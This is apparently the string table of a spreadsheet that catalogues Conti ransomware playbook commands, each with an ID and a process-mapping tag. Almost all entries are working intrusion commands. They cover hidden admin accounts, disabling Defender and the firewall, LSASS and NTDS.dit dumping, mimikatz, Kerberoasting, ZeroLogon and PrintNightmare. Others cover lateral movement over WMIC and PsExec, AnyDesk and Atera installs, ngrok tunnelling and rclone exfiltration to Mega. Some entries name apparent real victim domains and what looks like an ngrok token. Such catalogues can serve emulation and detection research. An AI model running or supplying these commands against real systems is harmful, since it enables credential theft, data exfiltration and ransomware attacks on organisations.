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harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{43955380-CD37-0347-92B1-0FC063B1122D}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="40" yWindow="-21100" windowWidth="38360" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="5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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2553" uniqueCount="1102">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>conti-eid0001</t>
  </si>
  <si>
    <t>shell SCHTASKS /s ip\hostname /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00</t>
  </si>
  <si>
    <t>conti-eid0002</t>
  </si>
  <si>
    <t>shell SCHTASKS /s ip\hostname /run /TN "WindowsSensor15"</t>
  </si>
  <si>
    <t>conti-eid0003</t>
  </si>
  <si>
    <t>shell schtasks /S ip\hostname /TN "WindowsSensor15" /DELETE /F</t>
  </si>
  <si>
    <t>conti-eid0004</t>
  </si>
  <si>
    <t>net user Admin Password1 /add</t>
  </si>
  <si>
    <t>conti-eid0005</t>
  </si>
  <si>
    <t>net localgroup Administrators Admin /add</t>
  </si>
  <si>
    <t>conti-eid0006</t>
  </si>
  <si>
    <t>net user oldadministrator "qc69t4B#Z0kE3" /add</t>
  </si>
  <si>
    <t>conti-eid0007</t>
  </si>
  <si>
    <t>net localgroup Administrators oldadministrator /ADD</t>
  </si>
  <si>
    <t>conti-eid0008</t>
  </si>
  <si>
    <t>reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f</t>
  </si>
  <si>
    <t>conti-eid0009</t>
  </si>
  <si>
    <t>gmer.exe</t>
  </si>
  <si>
    <t>conti-eid0010</t>
  </si>
  <si>
    <t>pchunter</t>
  </si>
  <si>
    <t>conti-eid0011</t>
  </si>
  <si>
    <t>PowerTool/64</t>
  </si>
  <si>
    <t>conti-eid0012</t>
  </si>
  <si>
    <t>delete DsMpEng.dll</t>
  </si>
  <si>
    <t>conti-eid0013</t>
  </si>
  <si>
    <t>powershell Set-MpPreference -DisableRealtimeMonitoring $true</t>
  </si>
  <si>
    <t>conti-eid0014</t>
  </si>
  <si>
    <t>conti-eid0015</t>
  </si>
  <si>
    <t>Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" -Name PortNumber -Value 1350</t>
  </si>
  <si>
    <t>conti-eid0016</t>
  </si>
  <si>
    <t>NetSh Advfirewall set allprofiles state off</t>
  </si>
  <si>
    <t>conti-eid0017</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group="remote desktop" new enable=Yes</t>
  </si>
  <si>
    <t>conti-eid0018</t>
  </si>
  <si>
    <t>conti-eid0019</t>
  </si>
  <si>
    <t>New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow</t>
  </si>
  <si>
    <t>conti-eid0020</t>
  </si>
  <si>
    <t>New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow</t>
  </si>
  <si>
    <t>conti-eid0021</t>
  </si>
  <si>
    <t>wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2&gt;&amp;1"</t>
  </si>
  <si>
    <t>conti-eid0022</t>
  </si>
  <si>
    <t>wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create"cmd /c copy \?
\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ &amp; copy \?
\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ &amp;copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log"</t>
  </si>
  <si>
    <t>conti-eid0023</t>
  </si>
  <si>
    <t>Esentutl /p C:\log\ntds.dit</t>
  </si>
  <si>
    <t>conti-eid0024</t>
  </si>
  <si>
    <t>wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ &amp; copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c\temp\log\ &amp; copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log"</t>
  </si>
  <si>
    <t>conti-eid0025</t>
  </si>
  <si>
    <t>rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full</t>
  </si>
  <si>
    <t>conti-eid0026</t>
  </si>
  <si>
    <t>wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"</t>
  </si>
  <si>
    <t>conti-eid0027</t>
  </si>
  <si>
    <t>remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full (Cobalt Strike command)</t>
  </si>
  <si>
    <t>conti-eid0028</t>
  </si>
  <si>
    <t>Dump using GUI while TA is on RDP
taskmgr
Open taskmgr
Go to process lsass
“Create Dump File”</t>
  </si>
  <si>
    <t>conti-eid0029</t>
  </si>
  <si>
    <t>privilege::debug</t>
  </si>
  <si>
    <t>conti-eid0030</t>
  </si>
  <si>
    <t>sekurlsa::minidump A:\3.WORK\BL-ws20\lsass.DMP</t>
  </si>
  <si>
    <t>conti-eid0031</t>
  </si>
  <si>
    <t>sekurlsa::logonpasswords</t>
  </si>
  <si>
    <t>conti-eid0032</t>
  </si>
  <si>
    <t>powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1</t>
  </si>
  <si>
    <t>conti-eid0033</t>
  </si>
  <si>
    <t>psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR% +" -LockoutThreshold 5</t>
  </si>
  <si>
    <t>conti-eid0034</t>
  </si>
  <si>
    <t>RouterScan.exe</t>
  </si>
  <si>
    <t>conti-eid0035</t>
  </si>
  <si>
    <t>netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255</t>
  </si>
  <si>
    <t>conti-eid0036</t>
  </si>
  <si>
    <t>wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows &gt;&gt; c:\log.txt"</t>
  </si>
  <si>
    <t>conti-eid0037</t>
  </si>
  <si>
    <t>powershell Get-DomainController</t>
  </si>
  <si>
    <t>conti-eid0038</t>
  </si>
  <si>
    <t>powershell Get-DomainComputer -OperatingSystem *server* -Properties dnshostname</t>
  </si>
  <si>
    <t>conti-eid0039</t>
  </si>
  <si>
    <t>powershell get-adcomputer -filter * | select -expand name</t>
  </si>
  <si>
    <t>conti-eid0040</t>
  </si>
  <si>
    <t>nltest /dclist:"NameDomain"</t>
  </si>
  <si>
    <t>conti-eid0041</t>
  </si>
  <si>
    <t>net view /all /domain</t>
  </si>
  <si>
    <t>conti-eid0042</t>
  </si>
  <si>
    <t>net group "Domain Admins" /domain</t>
  </si>
  <si>
    <t>conti-eid0043</t>
  </si>
  <si>
    <t>net group "Enterprise Admins" /domain</t>
  </si>
  <si>
    <t>conti-eid0044</t>
  </si>
  <si>
    <t>powershell Get-NetSubnet</t>
  </si>
  <si>
    <t>conti-eid0045</t>
  </si>
  <si>
    <t>nltest /domain_trusts /all_trusts</t>
  </si>
  <si>
    <t>conti-eid0046</t>
  </si>
  <si>
    <t>7za.exe a -tzip -mx5 \DC01\C$\temp\log.zip\DC01\C$\temp\log -pTOPSECRETPASSWORD</t>
  </si>
  <si>
    <t>conti-eid0047</t>
  </si>
  <si>
    <t>{
mkdir "C:\ProgramData\AnyDesk"
# Download AnyDesk
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\AnyDesk.exe"
$clnt.DownloadFile($url,$file)cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silentcmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
net user oldadministrator "qc69t4B#Z0kE3"/add
net localgroup Administrators oldadministrator /ADD
reg add"HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}</t>
  </si>
  <si>
    <t>conti-eid0048</t>
  </si>
  <si>
    <t>conti-eid0049</t>
  </si>
  <si>
    <t>conti-eid0050</t>
  </si>
  <si>
    <t>#!/bin/bash
OUTPATH="sorted"
F1INPATH="ad_computers.txt"
F2INPATH="ad_users.txt"
F2OUTPATH="ad_users_result.txt"
mkdir "$OUTPATH"
while read p; do
if [[ ${p:0:17} == "&gt;operatingSystem:" ]];
then
OSPATH=${p:18}
fi
if [[ ${p:0:13} == "&gt;dNSHostName:" ]]; then
if [[ ${OSPATH:0:14} == "Windows Server"
]]; then
echo ${p:14} &gt;&gt; "$OUTPATH/SERVERS.txt"
tmp=$(echo "$OSPATH" | cut -d' ' -f1-3)
echo ${p:14} &gt;&gt; "$OUTPATH/$tmp.txt"
else
echo ${p:14} &gt;&gt; "$OUTPATH/WORKERS.txt"
tmp=$(echo "$OSPATH" | cut -d' ' -f1-2)
echo ${p:14} &gt;&gt; "$OUTPATH/$tmp.txt"
fi
fi
done &lt; $F1INPATH
while read p; do
if [[ ${p:0:13} == "&gt;description:" ]]; then
DECR=${p:14}
DECR=${DECR%$'\r'}
fi
if [[ ${p:0:16} == "&gt;sAMAccountName:" ]];
then
ACCNAME=${p:17}
ACCNAME=${ACCNAME%$'\r'}
echo "$ACCNAME:$DECR" &gt;&gt; "$OUTPATH
/$F2OUTPATH"
fi
done &lt; $F2INPATH</t>
  </si>
  <si>
    <t>conti-eid0051</t>
  </si>
  <si>
    <t xml:space="preserve">Use of Cobalt Strike SHELL to execute variety of commands while exploitation. </t>
  </si>
  <si>
    <t>conti-eid0052</t>
  </si>
  <si>
    <t>shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass"process call create "cmd /c vssadmin list shadows &gt;&gt; c:\log.txt"</t>
  </si>
  <si>
    <t>conti-eid0053</t>
  </si>
  <si>
    <t>shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe"</t>
  </si>
  <si>
    <t>conti-eid0054</t>
  </si>
  <si>
    <t>shell wmic /node:172.16.0.36 process call create "rundll32.exe C:\ProgramData\p64.dll StartW"</t>
  </si>
  <si>
    <t>conti-eid0055</t>
  </si>
  <si>
    <t>remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\tlt.dll StartW</t>
  </si>
  <si>
    <t>conti-eid0056</t>
  </si>
  <si>
    <t>shell wmic /node:"PC NAME" process call create "COMMAND TO BE EXECUTED"</t>
  </si>
  <si>
    <t>conti-eid0057</t>
  </si>
  <si>
    <t>adfind.exe -f "(objectcategory=person)" &gt; ad_users.txt</t>
  </si>
  <si>
    <t>conti-eid0058</t>
  </si>
  <si>
    <t>adfind.exe -f "(objectcategory=organizationalUnit)" &gt; ad_ous.txt</t>
  </si>
  <si>
    <t>conti-eid0059</t>
  </si>
  <si>
    <t>adfind.exe -gcb -sc trustdmp &gt; trustdmp.txt</t>
  </si>
  <si>
    <t>conti-eid0060</t>
  </si>
  <si>
    <t>adfind.exe -f "(objectcategory=group)" &gt; ad_group.txt</t>
  </si>
  <si>
    <t>conti-eid0061</t>
  </si>
  <si>
    <t>adfind.exe -f objectcategory = computer -csv name cn OperatingSystem dNSHostName&gt; some.csv</t>
  </si>
  <si>
    <t>conti-eid0062</t>
  </si>
  <si>
    <t>adfind.exe -f "objectcategory=computer" &gt; ad_computers.txt</t>
  </si>
  <si>
    <t>conti-eid0063</t>
  </si>
  <si>
    <t>adfind.exe -subnets -f (objectCategory=subnet)&gt; subnets.txt</t>
  </si>
  <si>
    <t>conti-eid0064</t>
  </si>
  <si>
    <t>psinject 4728 x86 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 (Cobalt Strike command)</t>
  </si>
  <si>
    <t>conti-eid0065</t>
  </si>
  <si>
    <t>PowerView.ps1</t>
  </si>
  <si>
    <t>conti-eid0066</t>
  </si>
  <si>
    <t>psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt &gt;&gt; C:\ProgramData\out.txt</t>
  </si>
  <si>
    <t>conti-eid0067</t>
  </si>
  <si>
    <t>Invoke-UserHunter</t>
  </si>
  <si>
    <t>conti-eid0068</t>
  </si>
  <si>
    <t>Invoke-ShareFinder</t>
  </si>
  <si>
    <t>conti-eid0069</t>
  </si>
  <si>
    <t>psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt (Cobalt Strike command)</t>
  </si>
  <si>
    <t>conti-eid0070</t>
  </si>
  <si>
    <t>ngrok authtoken1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg</t>
  </si>
  <si>
    <t>conti-eid0071</t>
  </si>
  <si>
    <t>ngrok tcp 3389</t>
  </si>
  <si>
    <t>conti-eid0072</t>
  </si>
  <si>
    <t>start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe" "C:\windows\temp"</t>
  </si>
  <si>
    <t>conti-eid0073</t>
  </si>
  <si>
    <t>PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe</t>
  </si>
  <si>
    <t>conti-eid0074</t>
  </si>
  <si>
    <t>curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&amp;integratorLogin=REDACTED%40protonmail.com" &amp;&amp; msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1</t>
  </si>
  <si>
    <t>conti-eid0075</t>
  </si>
  <si>
    <t>shell setup_undefined.msi</t>
  </si>
  <si>
    <t>conti-eid0076</t>
  </si>
  <si>
    <t xml:space="preserve">MSBuild Install Atera Agent </t>
  </si>
  <si>
    <t>conti-eid0077</t>
  </si>
  <si>
    <t>conti-eid0078</t>
  </si>
  <si>
    <t>net domain_controllers</t>
  </si>
  <si>
    <t>conti-eid0079</t>
  </si>
  <si>
    <t>shell net localgroup administrators</t>
  </si>
  <si>
    <t>conti-eid0080</t>
  </si>
  <si>
    <t>shell whoami</t>
  </si>
  <si>
    <t>conti-eid0081</t>
  </si>
  <si>
    <t>shell whoami /groups</t>
  </si>
  <si>
    <t>conti-eid0082</t>
  </si>
  <si>
    <t>shell net group "Enterprise Admins" /domain</t>
  </si>
  <si>
    <t>conti-eid0083</t>
  </si>
  <si>
    <t>shell net group "Domain Computers" /domain</t>
  </si>
  <si>
    <t>conti-eid0084</t>
  </si>
  <si>
    <t>net computers</t>
  </si>
  <si>
    <t>conti-eid0085</t>
  </si>
  <si>
    <t>powershell-import /home/user/work/ShareFinder.ps1</t>
  </si>
  <si>
    <t>conti-eid0086</t>
  </si>
  <si>
    <t>psinject 1234 x64 Invoke-ShareFinder -CheckAdmin -Verbose | Out- File -Encoding ascii C:\ProgramData\sh.txt</t>
  </si>
  <si>
    <t>conti-eid0087</t>
  </si>
  <si>
    <t>psinject 5209 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shda.txt</t>
  </si>
  <si>
    <t>conti-eid0088</t>
  </si>
  <si>
    <t>powershell-import /home/user/work/Invoke-Kerberoast.ps1</t>
  </si>
  <si>
    <t>conti-eid0089</t>
  </si>
  <si>
    <t>psinject 4728 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force - Encoding UTF8</t>
  </si>
  <si>
    <t>conti-eid0090</t>
  </si>
  <si>
    <t>execute-assembly /home/user/work/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt</t>
  </si>
  <si>
    <t>conti-eid0091</t>
  </si>
  <si>
    <t>execute-assembly /home/user/work/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt</t>
  </si>
  <si>
    <t>conti-eid0092</t>
  </si>
  <si>
    <t>log nameoflog.log</t>
  </si>
  <si>
    <t>conti-eid0093</t>
  </si>
  <si>
    <t>mimikatz commands</t>
  </si>
  <si>
    <t>conti-eid0094</t>
  </si>
  <si>
    <t>lsadump::dcsync /user:Administrator</t>
  </si>
  <si>
    <t>conti-eid0095</t>
  </si>
  <si>
    <t>sekurlsa::pth /user: /domain: /ntlm: /run:cmd</t>
  </si>
  <si>
    <t>conti-eid0096</t>
  </si>
  <si>
    <t>getsystem
hashdump
logonpasswords</t>
  </si>
  <si>
    <t>mimikatz in cobalt strike</t>
  </si>
  <si>
    <t>conti-eid0097</t>
  </si>
  <si>
    <t>beacon&gt; make_token domen\user password – impersonate user token
beacon&gt; pth domen\user NTLM - impersonate user token
beacon&gt; rev2self – revert session to default
beacon&gt; dcsync domain.com (Replace domain.com - with domain) - acquire all hashes from
domain (domain administrator token is required)</t>
  </si>
  <si>
    <t>cobalt strike beacon</t>
  </si>
  <si>
    <t>conti-eid0098</t>
  </si>
  <si>
    <t>pth Domain\Admin pass (as hash) shell dir \\ip or hostname\c$ EliAdmin:1001:aad3b435b51404eeaad3b435b51404ee:b0059c57f5249ede3db768e388ee0b14:::
pth ELC\EliAdmin b0059c57f5249ede3db768e388ee0b14</t>
  </si>
  <si>
    <t>conti-eid0099</t>
  </si>
  <si>
    <t>make_token Domain\Admin Pass rev2self</t>
  </si>
  <si>
    <t>conti-eid0100</t>
  </si>
  <si>
    <t>procdump.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp procdump64.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp</t>
  </si>
  <si>
    <t>conti-eid0101</t>
  </si>
  <si>
    <t>mimikatz lsadump::zerologon /target:[controller.domain.local] /account:[controller]$/exploit</t>
  </si>
  <si>
    <t>conti-eid0102</t>
  </si>
  <si>
    <t>mimikatz lsadump::zerologon /target:DC01.contoso.com /account:DC01$ /exploit</t>
  </si>
  <si>
    <t>conti-eid0103</t>
  </si>
  <si>
    <t>shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full</t>
  </si>
  <si>
    <t>conti-eid0104</t>
  </si>
  <si>
    <t>shell wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID</t>
  </si>
  <si>
    <t>conti-eid0105</t>
  </si>
  <si>
    <t>C:\ProgramData\lsass.dmp full" remote-exec psexec [target] cmd /c rundll32.exe</t>
  </si>
  <si>
    <t>conti-eid0106</t>
  </si>
  <si>
    <t>powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1 psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1,</t>
  </si>
  <si>
    <t>conti-eid0107</t>
  </si>
  <si>
    <t>powershell Invoke-Nightmare -NewUser "HACKER" -NewPassword "FUCKER" -DriverName "Xeroxxx"</t>
  </si>
  <si>
    <t>conti-eid0108</t>
  </si>
  <si>
    <t>powershell-import //import file CVE-2021-34527.ps1</t>
  </si>
  <si>
    <t>conti-eid0109</t>
  </si>
  <si>
    <t>net user OldAdmin 1Q2w3E4r5T6y /add</t>
  </si>
  <si>
    <t>conti-eid0110</t>
  </si>
  <si>
    <t>net localgroup Administrators OldAdmin /ADD</t>
  </si>
  <si>
    <t>conti-eid0111</t>
  </si>
  <si>
    <t>https://github.com/rsmudge/ZeroLogon-BOF</t>
  </si>
  <si>
    <t>conti-eid0112</t>
  </si>
  <si>
    <t>dcsync domain.local</t>
  </si>
  <si>
    <t>conti-eid0113</t>
  </si>
  <si>
    <t>shell AGENT_INSTALLER.msi</t>
  </si>
  <si>
    <t>conti-eid0114</t>
  </si>
  <si>
    <t>shell nltest /domain_trusts /all_trusts</t>
  </si>
  <si>
    <t>conti-eid0115</t>
  </si>
  <si>
    <t>shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows &gt;&gt; c:\log.txt"</t>
  </si>
  <si>
    <t>conti-eid0116</t>
  </si>
  <si>
    <t>net start Volume Shadow Copy</t>
  </si>
  <si>
    <t>conti-eid0117</t>
  </si>
  <si>
    <t>shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2&gt;&amp;1"</t>
  </si>
  <si>
    <t>conti-eid0118</t>
  </si>
  <si>
    <t>shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NT DS.dit c:\temp\log\ &amp; copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ &amp; copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\"</t>
  </si>
  <si>
    <t>conti-eid0119</t>
  </si>
  <si>
    <t>conti-eid0120</t>
  </si>
  <si>
    <t>C:\programdata\netscan</t>
  </si>
  <si>
    <t>conti-eid0121</t>
  </si>
  <si>
    <t>shell netscan.exe /hide /auto:"resuult.xml" /config:netscan.xml /file:range.txt</t>
  </si>
  <si>
    <t>conti-eid0122</t>
  </si>
  <si>
    <t>beacon&gt; shell net group "domain admins" /domain</t>
  </si>
  <si>
    <t>conti-eid0123</t>
  </si>
  <si>
    <t>beacon&gt; shell net user ebernardo /domain</t>
  </si>
  <si>
    <t>conti-eid0124</t>
  </si>
  <si>
    <t>execute-assembly /home/user/soft/scripts/SharpView.exe Find- DomainUserLocation -UserIdentity gpetit</t>
  </si>
  <si>
    <t>linux</t>
  </si>
  <si>
    <t>conti-eid0125</t>
  </si>
  <si>
    <t>execute-assembly C:\Users\Андрей\Soft\Hacking\SharpView.exe Find-DomainUserLocation -UserIdentity gpetit</t>
  </si>
  <si>
    <t>conti-eid0126</t>
  </si>
  <si>
    <t>shell net view \\172.16.1.40 /ALL</t>
  </si>
  <si>
    <t>conti-eid0127</t>
  </si>
  <si>
    <t>shell dir \\172.16.1.40\c$</t>
  </si>
  <si>
    <t>conti-eid0128</t>
  </si>
  <si>
    <t>\\172.16.1.40\c$\Users\gpetit\AppData\Local\Filezilla
\\172.16.1.40\c$\Users\gpetit\AppData\Roaming\Filezilla</t>
  </si>
  <si>
    <t>conti-eid0129</t>
  </si>
  <si>
    <t>shell rclone.exe copy "шара" Mega:training -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M</t>
  </si>
  <si>
    <t>conti-eid0130</t>
  </si>
  <si>
    <t>shell rclone.exe copy "\\WTFINANCE.washoetribe.net\E$\FINANCE" mega:1 -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M</t>
  </si>
  <si>
    <t>conti-eid0131</t>
  </si>
  <si>
    <t>shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12</t>
  </si>
  <si>
    <t>conti-eid0132</t>
  </si>
  <si>
    <t>shell rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread- streams 12 --transfers 12</t>
  </si>
  <si>
    <t>conti-eid0133</t>
  </si>
  <si>
    <t>shell rclone.exe copy "\\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3</t>
  </si>
  <si>
    <t>conti-eid0134</t>
  </si>
  <si>
    <t xml:space="preserve">https://mega.io/sync </t>
  </si>
  <si>
    <t>conti-eid0135</t>
  </si>
  <si>
    <t>cyber
policy
insurance
endorsement
supplementary
underwriting
terms
bank
2020
2021
Statement</t>
  </si>
  <si>
    <t>conti keyword search</t>
  </si>
  <si>
    <t>conti-eid0136</t>
  </si>
  <si>
    <t>start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe" "C:\windows\temp\"</t>
  </si>
  <si>
    <t>conti-eid0137</t>
  </si>
  <si>
    <t>start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe</t>
  </si>
  <si>
    <t>conti-eid0138</t>
  </si>
  <si>
    <t>start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166\\DOMAIN CONTROLLER share$\fx166.exe %APPDATA%\fx166.exe&amp;%APPDATA%\fx166.exe"</t>
  </si>
  <si>
    <t>conti-eid0139</t>
  </si>
  <si>
    <t>gpedit.msc Select "Disable real-time protection" and change it to "Enabled"</t>
  </si>
  <si>
    <t>conti-eid0140</t>
  </si>
  <si>
    <t>conti-eid0141</t>
  </si>
  <si>
    <t>New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name
DisableAntiSpyware -Value 1 -PropertyType DWORD - Force</t>
  </si>
  <si>
    <t>rclone.exe copy "\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing  --auto-confirm --multi-thread-streams 3 --transfers 3</t>
  </si>
  <si>
    <t>rclone.exe copy "\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing  --auto-confirm --multi-thread-streams 12 --transfers 12</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>netsh firewall set service type =remotedesktop mode=enable</t>
  </si>
  <si>
    <t>script</t>
  </si>
  <si>
    <t xml:space="preserve">not a valid command </t>
  </si>
  <si>
    <t>generic</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t xml:space="preserve">privilege::debug
</t>
  </si>
  <si>
    <t>lsadump::sam</t>
  </si>
  <si>
    <t>token::elevate</t>
  </si>
  <si>
    <t>conti-eid0142</t>
  </si>
  <si>
    <t>conti-eid0143</t>
  </si>
  <si>
    <t>conti-eid0144</t>
  </si>
  <si>
    <t xml:space="preserve">Use of Cobalt Strike EXECUTE-ASSEMBLY to execute .net in memory </t>
  </si>
  <si>
    <t>conti-eid0145</t>
  </si>
  <si>
    <t>wmic-pid, vss-pid</t>
  </si>
  <si>
    <t>wmic-pid, cmd-pid, ntds-pid</t>
  </si>
  <si>
    <t>wmic-pid, cmd-pid,  ntds-pid</t>
  </si>
  <si>
    <t>comsvcs-pid, rundll-pid, wmic-pid</t>
  </si>
  <si>
    <t>wmic-pid</t>
  </si>
  <si>
    <t>comsvcs-pid, rundll-pid</t>
  </si>
  <si>
    <t>adfind-pid</t>
  </si>
  <si>
    <t>comsvcs-pid</t>
  </si>
  <si>
    <t>mimikatz-pid</t>
  </si>
  <si>
    <t>netclt-pid</t>
  </si>
  <si>
    <t>netscan-pid</t>
  </si>
  <si>
    <t>netsh-pid</t>
  </si>
  <si>
    <t>pshell-pid, anydesk-pid, netclt-pid</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>rclone-pid</t>
  </si>
  <si>
    <t>lsass-pid</t>
  </si>
  <si>
    <t>procdump-pid</t>
  </si>
  <si>
    <t>ntds-pid</t>
  </si>
  <si>
    <t>nltest-pid</t>
  </si>
  <si>
    <t>powerview-pid</t>
  </si>
  <si>
    <t>smbabrute-pid</t>
  </si>
  <si>
    <t>whoami-pid</t>
  </si>
  <si>
    <t>registry-pid</t>
  </si>
  <si>
    <t>conti-eid0146</t>
  </si>
  <si>
    <t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f &amp;&amp;</t>
  </si>
  <si>
    <t>pnightmare-pid</t>
  </si>
  <si>
    <t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>sharpview-pid, powerview-pid</t>
  </si>
  <si>
    <t>rubeus-pid</t>
  </si>
  <si>
    <t>psexec-pid</t>
  </si>
  <si>
    <t>ngrok</t>
  </si>
  <si>
